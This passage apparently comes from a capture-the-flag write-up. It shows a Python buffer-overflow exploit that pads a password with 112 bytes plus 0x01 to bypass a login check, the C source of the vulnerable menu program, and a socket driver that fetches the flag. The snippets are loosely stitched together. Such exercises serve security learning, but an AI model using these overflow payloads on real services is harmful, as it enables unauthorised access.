def login_overwrite(s):
    menu(s)
    s.sendall(b'2\n')
    recvuntil(s, b'Password: ')
    # 112 filler + 0x01 + newline
    payload = b'A' * 112 + b'\x01' + b'\n'
    s.sendall(payload)
To confirm this, I printed the address of user->pwd after registration:
struct user {
    char *name;   // 8 bytes
    char *pwd;    // 8 bytes
};
int main(void) {
    setbuf(stdout, NULL);
    while (1) {
        menu();
        int choice;
        if (scanf("%d%*c", &choice) != 1)
            break;
        switch (choice) {
        case 1: register_user(); break;
        case 2: login(); break;
        case 3: show_secret(); break;
        case 4: exit(0);
        default: puts("Invalid"); break;
        }
    }
    return 0;
}
import socket

def main():
    s = socket.create_connection((HOST, PORT))
    register(s)
    login_overwrite(s)
    get_flag(s)
    s.close()